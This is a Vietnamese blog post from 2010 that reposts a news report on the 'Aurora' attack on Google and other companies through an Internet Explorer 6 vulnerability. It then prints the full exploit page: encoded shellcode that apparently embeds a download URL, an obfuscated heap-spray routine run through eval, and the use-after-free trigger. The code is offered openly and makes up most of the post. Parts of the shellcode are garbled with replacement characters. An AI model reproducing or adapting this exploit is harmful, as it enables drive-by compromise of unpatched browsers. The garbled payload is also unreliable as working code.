Trao đổi với tôi

http://www.buidao.com

1/17/10

[Hacking] Mã độc tấn công Google được công khai trên mạng

Mã độc tấn công Google được công khai trên mạng
Đoạn mã (code) mà hacker Trung Quốc dùng để xâm nhập vào hệ thống của Google đã được công khai trên mạng vào cuối tuần này.

Đoạn mã trên đã được đưa lên trang phân tích phần mềm độc hại Wepawet hôm thứ Năm vừa rồi (14/1), và một ngày sau đó nó được bổ sung thêm công cụ tấn công. Theo Dave Marcus, giám đốc nghiên cứu bảo mật tại McAfee, cuộc tấn công diễn ra trên phiên bản IE6 trong Windows XP, và có thể được chỉnh sửa để tấn công trên các phiên bản IE mới nhất. Hacker đã sử dụng đoạn mã trên để chạy phần mềm bất hợp pháp trên máy tính nạn nhân sau khi lừa họ truy cập vào một trang web độc hại. Kịch bản này được cho là y hệt với những gì đã diễn ra với Google hồi năm ngoái khi hacker xâm nhập vào hệ thống máy tính nội bộ của hãng này. Trong cuộc tấn công lần này, ngoài Google ra còn có 33 công ty khác cũng bị xâm nhập, trong đó có cả Adobe Systems. Hôm 14/1 vừa rồi, Symantec và Juniper Networks tuyên bố họ sẽ cùng điều tra vụ việc này. Những cái tên như Yahoo, Northrop Grumman và Dow Chemical đều được nêu tên trong danh sách các nạn nhân mới nhất của hacker Trung Quốc. Cũng trong ngày 14/1, Microsoft đã đưa ra một thông báo về lỗ hổng trong IE, tuy nhiên hãng lại không đề cập tới khả năng có ban hành một miếng vá khẩn cấp hay không. Theo đúng kế hoạch, phải đến ngày 9/2 tới Microsoft mới ban hành miếng vá định kỳ, và như vậy hacker sẽ có thêm khoảng 3 tuần nữa để khai thác lỗ hổng trong IE. Trong khi đó, các nhà nghiên cứu bảo mật cho rằng khó có thể khai thác lỗ hổng trên trong Windows Vista hoặc Windows 7 bởi bộ nhớ của cả hai hệ điều hành này đều được Microsoft bảo vệ bằng công nghệ mới nhất. Tuy vậy, Cơ quan bảo mật liên bang Đức vẫn cảnh báo người dùng (tại Đức) nên sử dụng trình duyệt thay thế cho tới khi nào Microsoft ban hành bản vá.

nguồn: home.vnn.vn

code exploit:

Mã:

< html>< script>var sc = unescape("
%u9090\u19eb\u4b5b\u3390\u90c9\u7b80\ue901\u0175\u66c3\u7bb9\u8004\u0b34\ue2d8\uebfa\ue805
\uffe2\uffff\u3931\ufffd\u87d8\u79bc\ufffd\ufffd\u9853\u53d4\uc4a8\u5375\ud0b0\u2f53\ud7b2
\u3081\ufffd\ufffd\u3a48\ub020\ueaeb\ufffd\u8db0\ubdab\u8caa\u9e53\u30d4\ufffd\ufffd\u3053
\ufffd\u3081\ufffd\ufffd\u213a\ub7b0\ufffd\ub0d8\uaaad\ub5b4\u538c\ud49e\u0830\ufffd\u53d8
\ub230\u81d9\u9a30\ufffd\u3ad8\ub021\uebb4\ufffd\uabb0\ubdb0\u8cb4\u9e53\u30d4\ufffd\ufffd
\u3053\ufffd\u3081\ufffd\ufffd\u213a\u3459\ufffd\ufffd\u0453\u1b59\ufffd\ufffd\ufffd\uc2b2
\ub28b\u27d8\u9c8e\u18eb\u5898\ufffd\uadd8\u5121\u485e\ufffd\u1fd8\ufffd\ub984\ubdf6\u9c1f
\ufffd\ubda0\ufffd\u11eb\u8989\u8f8b\ueb89\u5318\u989e\u8630\ufffd\u5bd8\ufffd\u5dd7\ufffd
\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u8b18\u9e53\u30fc\ufffd\ufffd\u205b\ud727
\u865c\ufffd\u51d8\ub89e\ufffd\u2788\uf08e\u9e51\u53bc\u485e\ufffd\u1fd8\ufffd\uba84\ubdf6
\u9c1f\ufffd\ubda0\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u8b98\u9e53\u30fc\ufffd
\ufffd\u205b\ud727\uc45c\ufffd\u51d8\u5c5e\ufffd\u51d8\u5446\ufffd\u53d8\ub89e\ufffd\ufffd
\ufffd\u9e53\u88b8\u8e27\u1fe0\ua89e\ufffd\ufffd\u9e1f\ufffd\ufffd\u59d8\ufffd\ufffd\uebd8
\u5303\ubc86\ufffd\u9e55\u88a8\ufffd\ufffd\u8fd8\uae27\u27b8\ufffd\u11eb\ufffd\ufffd\u58d8
\ud7a4\u4d27\ud4ac\ua458\u27d7\uacd8\u58dd\ud7ac\u4d27\u333a\u1b53\ufffd\ufffd\u5bd8\ufffd
\ufffd\u8651\ub2a8\u55d8\uac9e\u2788\ua8ae\u278f\u5c6e\ufffd\u27d8\ue88e\u3359\ufffd\ufffd
\u235b\ua7d8\u277d\ub8ae\u8e27\u27ec\u5c6e\ufffd\u27d8\uec8e\u5e53\ufffd\ufffd\u4653\ufffd
\ufffd\ufffd\u84db\uf6b9\u8bbd\u8e27\u53f4\u5466\ufffd\u53d8\u485e\ufffd\u1fd8\ufffd\uba84
\ubdf6\u3459\ufffd\ufffd\u0453\ufffd\ufffd\u8bd8\ufffd\ufffd\u8fd8\ufffd\ufffd\u8e27\u53c4
\ueb23\ueb18\u5903\ufffd\ufffd\u53d8\u5b14\u8c20\ud0a5\uc451\u5bd9\ufffd\u2b33\u1453\u0153
\u1b5b\uebc8\u8818\u8b89\u8888\u8888\u8888\u888f\u5388\ud09e\u2f30\ufffd\u53d8\ue4a6\uec30
\ufffd\u30d8\ufffd\ufffd\ubbb0\uafae\ub0d8\ub0ab\ub7bc\u538c\ud49e\u6e30\ufffd\u51d8\ue49e
\u79bc\ufffd\ufffd\u7855\u27b8\u2727\ubdb2\uae27\u53e4\uc89e\u4230\ufffd\uebd8\u8b03\u8b8b
\u278b\u3008\ufffd\ufffd\u3459\ufffd\ufffd\u2453\u1f5b\u1fdc\ueadf\u49ac\u1fd4\ufffd\u51bb
\u9709\u9f1f\u78d0\u4fbd\u1f13\ud49f\u9889\ua762\u9f1f\ue6c8\u6ec5\u1fe1\ucc9f\ub160\uc30c
\u9f1f\u66c0\ubea7\u1f78\uc49f\u7124\u75ef\u9f1f\u40f8\uc8d2\ubc20\ue879\ufffd\u53d8\ud498
\ua853\u75c4\ub053\u53d0\u512f\ubc8e\ufffd\u3081\ufffd\ufffd\u3a48\ub020\ueaeb\ufffd\u8db0
\ubdab\u8caa\ufffd\uca30\ufffd\u53d8\ub230\u81dd\u5c30\ufffd\u3ad8\ueb21\u8f27\u8e27\u58dc
\u30e0\ue058\uad31\u59c9\ufffd\u4848\u4848\ud0ac\u2753\u538d\u5534\ufffd\u3827\ue030\ufffd
\u1bd8\ue058\u5830\u31e0\uc9ad\ua059\u48dd\u4848\uac48\ub03f\ud2d0\ufffd\u9855\u27dd\u3038
\ufffd\ufffd\u301b\ufffd\ufffd\uc960\ufffd\u1a58\ufffd\ufffd\u1b80\u2130\u2727\u8327\ufffd
\u5160\ufffd\u1fbe\ufffd\u3827\u8b1b\u0453\ub28b\ub098\uc8d8\ufffd\u538f\uf89e\u5e30\u2727
\u8027\u891b\u538e\ue4ad\uac53\ua0f6\u2ddb\u538e\uf8ae\u2ddb\u11eb\u9991\ufffd\ueb1d\ud703
\uc866\u0ee2\ud0ac\u1319\ufffd\u9802\u2933\uc7e3\u3fad\u5386\ufc86\u05db\u53be\u93d4\u8653
\ufffd\u5305\u53dc\u1ddb\u8673\u1b81\uc230\u2724\u6a27\u3a2a\u6a2c\ud7ee\u28cb\ua390\ueae5
\u49ac\u5dd4\u7707\ubb63\u0951\u8997\u6298\ufffd\ufa4a\uc6a8\ubc7c\u4b37\u3cea\u564c\ud2cb
\ua174\u3ee1\u1c40\uc755\u8fac\ud5be\u9b27\u7466\u4003\uc8d2\u5820\u770e\u2342\ucd8b\ub0be
\uacac\ue2a8\uf7f7\ubdbc\ub7b5\uf6e9\uacbe\ub9a8\ubbbb\uabbd\uf6ab\ubbbb\ubcf7\ub5bd\uf7b7
\ubcb9\ub2f6\ubfa8Ø");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}
< /script>< /html>

The "Aurora" IE Exploit used in Chinese Google Attack in Action:

http://blog.metasploit.com/2010/01/r...e-exploit.html